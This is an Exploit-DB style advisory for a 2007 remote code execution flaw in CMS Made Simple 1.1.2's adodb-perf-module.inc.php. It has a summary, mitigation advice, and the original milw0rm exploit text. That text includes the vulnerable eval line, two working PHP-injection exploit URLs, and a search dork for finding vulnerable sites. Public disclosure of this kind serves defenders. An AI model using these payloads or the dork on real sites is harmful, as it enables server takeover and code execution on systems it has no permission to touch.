CMS Made Simple 1.1.2 Remote Code Execution Vulnerability

vendor:

CMS Made Simple

by:

irk4z@yahoo.pl

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: CMS Made Simple

Affected Version From: 1.1.2002

Affected Version To: 1.1.2002

Patch Exists: NO

Related CWE:

CPE: CMS Made Simple 1.1.2

Metasploit:

Other Scripts:

Platforms Tested:

2007

CMS Made Simple 1.1.2 Remote Code Execution Vulnerability

This vulnerability allows an attacker to execute arbitrary code on the target system. The vulnerability exists in the 'adodb-perf-module.inc.php' file, where user-supplied input is not properly sanitized before being passed to an 'eval' function. An attacker can exploit this vulnerability by sending a specially crafted request to the affected system, resulting in the execution of arbitrary PHP code.

Mitigation:

Update CMS Made Simple to a version that is not affected by this vulnerability. Additionally, ensure that user-supplied input is properly sanitized before being executed.

Source

Exploit-DB raw data:

#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability             #
# author: irk4z@yahoo.pl                                                       #
# download:                                                                    #
#  http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip  #
# dork: "powered by CMS Made Simple version 1.1.2"                             #
# greetz: cOndemned, kacper, str0ke                                            #

# code:

/lib/adodb_lite/adodb-perf-module.inc.php:
...
 eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...

# exploit:

 http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
 http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]

# milw0rm.com [2007-09-21]